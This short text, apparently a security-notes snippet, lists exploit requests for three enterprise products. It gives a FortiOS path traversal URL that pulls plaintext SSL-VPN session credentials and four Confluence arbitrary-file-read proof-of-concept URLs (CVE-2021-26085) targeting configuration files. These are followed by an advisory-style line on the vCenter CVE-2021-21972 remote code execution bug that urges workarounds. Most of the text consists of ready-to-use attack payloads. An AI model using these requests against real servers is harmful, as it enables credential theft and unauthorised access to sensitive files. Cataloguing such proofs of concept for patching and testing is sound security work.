Fortinet FortiOS Path Traversal Retrieving plaintext credentials: https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
POCs for Atlassian Confluence Server Arbitrary File Read: 1) http://127.0.0.1/s/123cfx/_/;/WEB-INF/web.xml 2) http://127.0.0.1/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml 3) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties 4) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml https://github.com/ColdFusionX/CVE-2021-26085
VMware vCenter Server vSphere Client remote code execution Attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy to exploit vulnerability. Therefore future exploitation is likely. Also, this vulnerability exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374